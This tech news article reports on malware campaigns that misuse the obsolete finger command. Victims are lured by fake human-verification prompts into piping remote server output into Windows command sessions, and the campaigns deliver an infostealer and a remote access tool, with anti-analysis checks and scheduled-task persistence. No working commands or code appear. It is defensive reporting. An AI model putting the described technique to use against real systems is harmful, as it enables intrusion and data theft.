- The “finger” command remains exploitable for remote code execution even after years of deprecation
- Attackers use batch scripts to pipe server responses directly to Windows command sessions
- Hidden Python programs are delivered via files disguised as harmless documents.
The finger command is an old network search tool originally used to obtain basic information about users of local or remote systems on Unix and later Windows.
It was gradually abandoned as modern user authentication and query systems became standard, but this decade-old threat has apparently quietly resurfaced in malicious operations targeting users who unknowingly execute remote instructions extracted via the obsolete protocol.
The method is based on retrieving text-based commands from a remote Finger server and executing them locally by executing standard Windows commands.
Old but still dangerous
Interest in this activity resurfaced when a researcher examined a batch script that triggered a finger request through a remote server before routing the response to a live Windows command session.
The referenced server has since become unresponsive, although additional samples showing behavior similar to ongoing attacks were later linked.
One example involved a person who thought he was completing a human verification step, when in fact he executed a command that connected to a digital address while the output was transmitted directly to a command processor session.
Although the server is no longer responding, the previously captured output showed a sequence that created random paths, cloned a system tool, and extracted a compressed file disguised as a harmless document.
Inside that file was a Python program that was launched via pythonw.exe and then communicated with a remote server to confirm execution.
A related batch file suggested that the package contained information-stealing behavior rather than a harmless testing tool.
Another campaign used a similar request pattern, but went to a different server and delivered almost identical automation.
Analysts noted that this release sought common reverse engineering tools and monitoring utilities.
It then exited when detected, implying a level of awareness often seen in prepared malware activity.
If no detection utilities were found, the script downloaded a separate zip file that delivered a known remote access tool used for unauthorized control sessions.
This is followed by scheduling a task that starts it every time the user logs in.
This abuse appears to involve a single actor, although accidental victims continue to report similar incidents.
People are reminded that secure computing now requires up-to-date antivirus systems, reliable malware removal practices, and a properly configured firewall.
It may seem strange that a legacy search tool still poses a risk, but older protocols can still create real entry points when combined with social engineering.
Via BleepingComputer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
